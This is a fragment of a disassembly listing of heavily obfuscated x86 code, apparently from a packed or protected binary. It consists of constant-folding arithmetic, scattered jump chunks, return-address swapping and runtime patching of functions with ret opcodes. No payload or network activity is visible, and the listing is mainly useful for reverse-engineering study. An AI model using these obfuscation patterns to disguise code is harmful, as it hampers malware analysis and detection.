loc_454376:				; CODE XREF: sub_446D8D:loc_439375j
		xor	eax, 6CF94D4Bh
		call	sub_457C82
		jmp	loc_443266
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		jmp	loc_441D60

; =============== S U B	R O U T	I N E =======================================



sub_45438B	proc near		; CODE XREF: sub_40F02F:loc_40F083p
					; sub_40F0AC:loc_40F104p ...

; FUNCTION CHUNK AT 0045AABC SIZE 00000005 BYTES

		push	edi
		push	45BA2D11h
		pop	edi
		or	edi, 56A67475h
		and	edi, 7F38DA42h
		call	sub_44E68D

loc_4543A3:				; DATA XREF: sub_4408AE+168E8o
		push	0
		jmp	loc_45AABC
sub_45438B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4543AA:				; CODE XREF: sub_454099:loc_4575F8j
		cmp	dword ptr [ebp-10Ch], 36343831h
		jnz	loc_441D60
		jmp	loc_442C65
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		mov	edx, 0E996F72Eh
		call	sub_446A16
		push	eax
		ror	eax, 9
		mov	ds:dword_458D98, eax
		jmp	loc_451902
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_427. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4543D9:				; CODE XREF: hvvrg7ie:0043CBCEj
		add	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_44CA4B

loc_4543DB:				; CODE XREF: sub_44CA4B:loc_454A1Bj
		xor	eax, 251D07CEh
		add	eax, 0AE245394h
		add	eax, ebp
		add	eax, 65C055BAh
		mov	eax, [eax]
		mov	eax, [eax+24h]
		jmp	loc_459D21
; END OF FUNCTION CHUNK	FOR sub_44CA4B
; ---------------------------------------------------------------------------
		shl	edi, 1Dh
		jmp	sub_452278
; ---------------------------------------------------------------------------
		mov	ds:dword_41D148, eax
		lea	eax, nullsub_535
		mov	byte ptr [eax],	0C3h
		jmp	loc_4406A4
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		jmp	loc_44A044
; ---------------------------------------------------------------------------

loc_454420:				; CODE XREF: hvvrg7ie:0044B60Aj
		rol	eax, 0Bh
		xor	eax, ds:4000F2h
		rol	eax, 17h
		add	eax, 3E1E2A09h
		jmp	loc_43D085
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_454437:				; CODE XREF: sub_44E6A5:loc_458D90j
		rol	eax, 5
		add	eax, 1D8D101Dh
		push	esi
		push	79CF3676h
		jmp	loc_43FF93
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------

loc_45444B:				; CODE XREF: hvvrg7ie:0044F655j
		sbb	edx, 3C2AB17Fh

; =============== S U B	R O U T	I N E =======================================



sub_454451	proc near		; CODE XREF: sub_439C28p

; FUNCTION CHUNK AT 00457809 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458D07 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		mov	esi, eax
		jmp	loc_457809
sub_454451	endp

; ---------------------------------------------------------------------------

loc_45445D:				; CODE XREF: hvvrg7ie:004426A4j
		jle	loc_455B03

; =============== S U B	R O U T	I N E =======================================



sub_454463	proc near		; CODE XREF: sub_453CDE+3p

; FUNCTION CHUNK AT 0043B4ED SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004490FF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AA70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B69A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D1C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045628E SIZE 00000004 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	esp, 0FFFFFFF4h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-8], 0
		jnz	loc_449105
		jmp	loc_4490FF
sub_454463	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CB5

loc_45447F:				; CODE XREF: sub_445CB5:loc_444D03j
		jz	loc_44A7B6
		jmp	loc_4418D0
; END OF FUNCTION CHUNK	FOR sub_445CB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_440. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_45448B:				; CODE XREF: sub_45889B-1020j
		jmp	loc_441D8B
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_454490:				; CODE XREF: hvvrg7ie:0044F725j
		jmp	loc_454F2D
; ---------------------------------------------------------------------------
		cmp	ecx, edi
		jmp	loc_441B20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A70

loc_45449C:				; CODE XREF: sub_441A70:loc_44229Cj
		mov	eax, edx

loc_45449E:				; CODE XREF: sub_4413A5:loc_43B1C8j
		pop	edx
		call	sub_4496DF

loc_4544A4:				; CODE XREF: hvvrg7ie:0044F6EAj
		or	ecx, 38BE733Ah
; END OF FUNCTION CHUNK	FOR sub_441A70

; =============== S U B	R O U T	I N E =======================================



sub_4544AA	proc near		; CODE XREF: sub_451110+7p

; FUNCTION CHUNK AT 004392A2 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0043C449 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004455EC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045AEFF SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	9488D62Eh
		pop	ecx
		or	ecx, 0A308AFF5h
		xor	ecx, 0B04356F3h
		add	eax, ecx
		jmp	loc_4455EC
sub_4544AA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_4544C7:				; CODE XREF: sub_440C61:loc_43F3F4j
		xor	eax, 2B188FF8h
		add	eax, ebp
		add	eax, 673CE5EDh
		mov	eax, [eax]
		jmp	loc_4461DD
; END OF FUNCTION CHUNK	FOR sub_440C61
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4544DD	proc near		; DATA XREF: sub_43B35B:loc_44F715o

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 004391D7 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043945A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439ECC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AE5E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043D607 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043DEEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EB77 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440AE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044105F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442D85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444EB4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444FAF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004475AB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448B94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044920F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449B22 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C195 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD53 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E597 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044F65B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452097 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457366 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045779E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004578B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004590D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AE49 SIZE 00000022 BYTES

		add	esp, 0FFFFFFF8h
		push	eax
		push	ebx
		pop	eax
		xchg	eax, [esp+0Ch+var_C]
		mov	[ebp-4], eax
		mov	eax, offset dword_4578BC
		jmp	loc_444FAF
sub_4544DD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_4544F3:				; CODE XREF: sub_43E128+B1D9j
		add	edi, 701DDB79h
		mov	[edi], eax
		pop	edi

loc_4544FC:				; CODE XREF: sub_4404E7+2j
					; sub_43D30A+11980j
		jo	loc_43EFA0
		jmp	loc_44B893
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_454507:				; CODE XREF: sub_454099:loc_43B9DDj
		jz	loc_4474F1
		jmp	loc_456C9B
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_454512:				; CODE XREF: sub_453BBD:loc_45B38Bj
		or	edx, edx
		jnz	loc_43CAE2
		jmp	loc_439F3C
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45451F:				; CODE XREF: sub_43D285:loc_447D2Cj
		add	eax, 3BB99280h
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		jmp	loc_452223
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAE1

loc_454530:				; CODE XREF: sub_45AAE1+Aj
		xor	ecx, 2BAA7435h
		sub	ecx, 7F18756Fh
		jnz	loc_43C639

loc_454542:				; CODE XREF: sub_43D369+7j
		jmp	nullsub_511
; END OF FUNCTION CHUNK	FOR sub_45AAE1
; ---------------------------------------------------------------------------
		shr	eax, 13h
		jmp	loc_43D9D6

; =============== S U B	R O U T	I N E =======================================



sub_45454F	proc near		; CODE XREF: hvvrg7ie:0043C64Dj
					; sub_44955C:loc_44CBEEp
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_190
sub_45454F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45455B:				; CODE XREF: hvvrg7ie:loc_43FF10j
		pop	edx
		jmp	loc_43DA9E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_454561:				; CODE XREF: sub_4466A4:loc_44DB28j
		xchg	edx, [esp+4+var_4]
		jmp	loc_440B1F
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_454569:				; CODE XREF: sub_44271E:loc_43A314j
		or	ebp, 232EDDF2h
		mov	ebx, [edi]
		jmp	loc_445B62
; END OF FUNCTION CHUNK	FOR sub_44271E
; ---------------------------------------------------------------------------
		cmp	edi, ebp
		jmp	loc_441A82
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_290. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_45457E:				; CODE XREF: sub_44D2F8+C4E3j
		jnz	loc_455175
		shr	edx, 12h

loc_454587:				; CODE XREF: sub_44D2F8:loc_43FE51j
					; sub_44D2F8-BF22j ...
		jo	loc_44CB02
		cmp	dword ptr [ebp-4], 3
		jnz	loc_45486B
		jmp	loc_451749
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		not	edx
		jmp	loc_44BAF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AE5

loc_4545A3:				; CODE XREF: sub_452AE5-1B4j
		jz	loc_44906F
		jmp	loc_43B93D
; END OF FUNCTION CHUNK	FOR sub_452AE5
; ---------------------------------------------------------------------------

loc_4545AE:				; CODE XREF: hvvrg7ie:0043B7E9j
		pop	ecx
		xor	ecx, 7560B616h

loc_4545B5:				; CODE XREF: hvvrg7ie:loc_447AC7j
		add	ecx, 0F3F4701Fh
		xchg	ecx, [esp]
		jmp	loc_43D70C
; ---------------------------------------------------------------------------
		adc	edi, 9744EAB4h
		popf
		jmp	sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_4545CF:				; CODE XREF: sub_4527A1-4FABj
		cdq
		sub	esi, 0D03617D0h
		jmp	loc_4416DD
; END OF FUNCTION CHUNK	FOR sub_4527A1

; =============== S U B	R O U T	I N E =======================================



sub_4545DB	proc near		; DATA XREF: sub_450FF2-5DAFo

; FUNCTION CHUNK AT 00447E11 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		jmp	loc_447E11
sub_4545DB	endp

; ---------------------------------------------------------------------------

loc_4545E3:				; CODE XREF: hvvrg7ie:0043C4AEj
		jle	loc_45AD99
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4545E9:				; CODE XREF: sub_45889B:loc_44E97Fj
		cmp	esi, ebx
		jmp	loc_44BC64
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_4545F0:				; CODE XREF: hvvrg7ie:loc_44A1ECj
		pop	edi
		sub	eax, 56FA42F3h
		not	edi
		jmp	loc_4558F1
; ---------------------------------------------------------------------------
		jmp	ds:off_41D1AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_454604:				; CODE XREF: sub_447E56-B06j
					; sub_447084+25CDj ...
		jo	loc_449656
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		pop	eax
		mov	eax, [esp+0]
		push	offset sub_447084
		jmp	loc_44E345
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_45461D:				; CODE XREF: sub_45B048-21347j
		jnz	loc_4481F3
		jmp	loc_43B46B
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_454628:				; CODE XREF: hvvrg7ie:0043BB69j
		jmp	ds:dword_41D058
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_45462E:				; CODE XREF: sub_44E4A6+9CC8j
		jmp	loc_43E59A
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_346. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	al, 24h
		mov	edx, eax
		pop	eax
		jmp	loc_43AA48
; ---------------------------------------------------------------------------

loc_45463E:				; CODE XREF: hvvrg7ie:0045AF87j
		pop	edi
		or	edi, 8FABF33Ch
		add	edi, 5095AD72h
		xchg	edi, [esp]
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_454653:				; CODE XREF: sub_43D964+8BAEj
		jnz	loc_4453A1

loc_454659:				; CODE XREF: sub_445D53+C971j
		jmp	loc_43C76A
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
		cmp	esi, 0EC46A787h
		jmp	loc_44538A

; =============== S U B	R O U T	I N E =======================================



sub_454669	proc near		; DATA XREF: hvvrg7ie:004469A7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E5C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FFA1 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_44973C
		mov	eax, 0C684C00Ch
		jmp	loc_44FFA1
sub_454669	endp

; ---------------------------------------------------------------------------
		cmp	esi, 1F63CAAFh
		jmp	loc_43B77C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_454689:				; CODE XREF: sub_44736C:loc_4491BBj
		jbe	loc_441158
		mov	esi, [edi]
		cdq
		jmp	loc_451C15
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_454697:				; CODE XREF: sub_43D47E:loc_44B42Bj
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_450F97
		mov	eax, 3C248B30h
		jmp	loc_441B7E
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585BB

loc_4546AB:				; CODE XREF: sub_4585BB:loc_4509F9j
		sub	edx, esi
		pop	esi
		xor	eax, ebx
		push	eax
		push	9E6E67BBh
		pop	eax
		rol	eax, 9
		jmp	loc_43FD96
; END OF FUNCTION CHUNK	FOR sub_4585BB
; ---------------------------------------------------------------------------
		test	ecx, esi
		jmp	loc_459E04

; =============== S U B	R O U T	I N E =======================================



sub_4546C6	proc near		; CODE XREF: sub_43D0B7+Ap
		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, sub_448ECC
		mov	byte ptr [eax],	0C3h
		jmp	sub_448ECC
sub_4546C6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	nullsub_486
		jmp	loc_43F8CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_4546E2:				; CODE XREF: sub_44D4EF:loc_459747j
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44359D

loc_4546E4:				; CODE XREF: sub_44359D+18j
		jmp	loc_447417
; END OF FUNCTION CHUNK	FOR sub_44359D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4546E9	proc near		; CODE XREF: hvvrg7ie:0044D83Fp
					; sub_4554E8:loc_4517A7p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C277 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444A65 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447435 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A98A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004504C1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452BAC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453997 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458B2C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AD37 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		jmp	loc_453997
sub_4546E9	endp


; =============== S U B	R O U T	I N E =======================================



sub_4546F5	proc near		; DATA XREF: sub_44DE0A+BBBFo

; FUNCTION CHUNK AT 0044C9AB SIZE 00000005 BYTES

		lea	eax, [ebp-14h]
		push	eax

loc_4546F9:				; CODE XREF: hvvrg7ie:0043B782j
		call	sub_43A87E
		jmp	loc_44C9AB
sub_4546F5	endp


; =============== S U B	R O U T	I N E =======================================



sub_454703	proc near		; CODE XREF: sub_44DE0A+3j

; FUNCTION CHUNK AT 0043F9D8 SIZE 00000021 BYTES

		add	esp, 0FFFFFFECh
		mov	eax, offset dword_453878
		call	sub_45A98D
		cmp	ds:dword_45388C, 0
		jmp	loc_43F9D8
sub_454703	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45471C	proc near		; CODE XREF: sub_4598CF+4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CD74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004434EB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454BEA SIZE 00000005 BYTES

		push	edx
		push	2DE9F08Eh
		pop	edx
		and	edx, 123F676h
		rol	edx, 0Fh
		add	edx, 8423050h
		jmp	loc_43CD74
sub_45471C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_454737:				; CODE XREF: sub_44D2F8:loc_43C538j
		jle	loc_4575E9
		mov	eax, [esi]
		sbb	esi, edi
		push	2EF6F1C1h
		jmp	loc_45486B
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_45474B:				; CODE XREF: hvvrg7ie:0043C9A6j
		cmp	esi, 1710AE8Eh
		jmp	loc_43D7ED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_553. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_454757:				; CODE XREF: sub_4527A1-C944j
		jmp	loc_44C552
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_45475C:				; CODE XREF: sub_4466CE:loc_43F4E9j
		sub	ebx, 0BBC88FCAh
		shl	ebx, 16h
		jmp	loc_44C2A2
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_45476A:				; CODE XREF: sub_447E20+12EE9j
		jle	loc_4580BD

loc_454770:				; CODE XREF: sub_447E20:loc_4454ABj
		call	sub_4580B4

loc_454775:				; CODE XREF: sub_4594D6+Dj
		jmp	loc_44B5A3
; END OF FUNCTION CHUNK	FOR sub_447E20
; ---------------------------------------------------------------------------

loc_45477A:				; CODE XREF: hvvrg7ie:00452140j
		jmp	loc_43E5F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44524C

loc_45477F:				; CODE XREF: sub_44524C+9j
		jmp	loc_440BC9
; END OF FUNCTION CHUNK	FOR sub_44524C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44631F

loc_454784:				; CODE XREF: sub_44631F-6614j
					; sub_44370F-D95j
		jmp	loc_458B0C
; END OF FUNCTION CHUNK	FOR sub_44631F

; =============== S U B	R O U T	I N E =======================================



sub_454789	proc near		; DATA XREF: sub_45265D:loc_43B121o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C849 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D58A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFDC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004408E2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442656 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004489DF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E9DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F472 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004512FF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045157B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451907 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045764C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458369 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AAA8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B34A SIZE 0000001B BYTES

		movzx	eax, word ptr [ebp-6]
		call	sub_43C048

loc_454792:				; CODE XREF: sub_44E3B3-E805j
		jmp	loc_45157B
sub_454789	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454797:				; CODE XREF: hvvrg7ie:0043EF29j
		jmp	loc_45609E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_45479C:				; CODE XREF: sub_4484E1:loc_43E52Cj
		push	6B7E41B2h
		pop	esi
		xor	esi, 0EE59A69Eh
		and	esi, 95B2286Ch
		jmp	loc_43C33D
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------

loc_4547B3:				; CODE XREF: hvvrg7ie:00443AC3j
		jo	loc_45031A
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4547B9:				; CODE XREF: sub_4465A6:loc_453102j
		push	offset sub_446356

loc_4547BE:				; CODE XREF: hvvrg7ie:loc_4411F0j
		jmp	nullsub_338
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_4547C3:				; CODE XREF: sub_44646D:loc_456B7Bj
		jnz	loc_44DE33
		jmp	loc_43FF32
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_4547CE:				; CODE XREF: sub_43F8AB+10513j
		and	edi, 753C291Eh
		sub	edi, 8A00083Bh
		add	edi, 3A3CB5F3h
		xchg	edi, [esp+0]
		jmp	sub_453E08
; END OF FUNCTION CHUNK	FOR sub_43F8AB

; =============== S U B	R O U T	I N E =======================================



sub_4547E8	proc near		; DATA XREF: sub_45038B-CA6Eo
		push	edx
		push	0B40EDA83h
		pop	edx
		xor	edx, 24929991h
		rol	edx, 9
		jb	loc_44BAFE
sub_4547E8	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_4547FE:				; CODE XREF: sub_43E26C+97Cj
		jmp	nullsub_194
; END OF FUNCTION CHUNK	FOR sub_43E26C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_274. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_454804:				; CODE XREF: sub_43EB47:loc_441C05j
		jz	loc_447D03
		jmp	loc_4448C4
; END OF FUNCTION CHUNK	FOR sub_43EB47

; =============== S U B	R O U T	I N E =======================================



sub_45480F	proc near		; CODE XREF: sub_439549:loc_43D50Fp
					; hvvrg7ie:0044A20Bj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440600 SIZE 00000003 BYTES

		xchg	esi, [esp+0]
		pop	esi

loc_454813:				; CODE XREF: hvvrg7ie:loc_44B83Cj
		mov	edx, [esp-4+arg_0]
		mov	al, 1
		call	edx
		jmp	loc_440600
sub_45480F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ecx, [edi]
		jmp	sub_4446E9
; ---------------------------------------------------------------------------

loc_454826:				; CODE XREF: hvvrg7ie:004458FCj
		push	70CD1255h
		pop	edx
		rol	edx, 18h
		or	edx, 29F8CA49h
		add	edx, 0F92765D5h
		xor	edx, 77203530h
		xchg	edx, [esp]
		call	sub_44D798

loc_454849:				; CODE XREF: hvvrg7ie:0044AAECj
		jmp	loc_446C0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_45484E:				; CODE XREF: sub_452265-B4E6j
		jmp	loc_446DD8
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------
		sub	ebx, 2D77E779h
		jmp	sub_454D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_45485E:				; CODE XREF: sub_44736C-DB6Cj
		jz	loc_443D7D
		jmp	loc_44D6D9
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_454869:				; CODE XREF: sub_44D2F8-12FB2j
		and	ebx, esi

loc_45486B:				; CODE XREF: sub_44D2F8:loc_448A62j
					; sub_44D2F8-7F2j ...
		jnz	loc_43A598
		call	sub_43F227

loc_454876:				; CODE XREF: sub_4571A0-15B7Fj
		jmp	sub_44A2AF
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEE1

loc_45487B:				; CODE XREF: sub_45AEE1+Aj
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h

loc_454880:				; CODE XREF: hvvrg7ie:loc_444D08j
		jnz	loc_43C087
		jmp	loc_445D88
; END OF FUNCTION CHUNK	FOR sub_45AEE1
; ---------------------------------------------------------------------------

loc_45488B:				; CODE XREF: hvvrg7ie:0045401Aj
		rol	ecx, 0Eh

; =============== S U B	R O U T	I N E =======================================



sub_45488E	proc near		; CODE XREF: sub_4561C8+6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B4B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BD08 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BF4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E25F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E3B2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441F5E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004436AE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004466B0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00447051 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B296 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C3B6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451316 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E65 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edi
		jmp	loc_44B296
sub_45488E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454898:				; CODE XREF: hvvrg7ie:0043B6CDj
		xor	eax, 66EF9EBDh
		cmp	ecx, 72D81A2Dh
		jmp	loc_45AFB3
; ---------------------------------------------------------------------------

loc_4548A9:				; CODE XREF: hvvrg7ie:0043A6C6j
		rol	eax, 0Bh
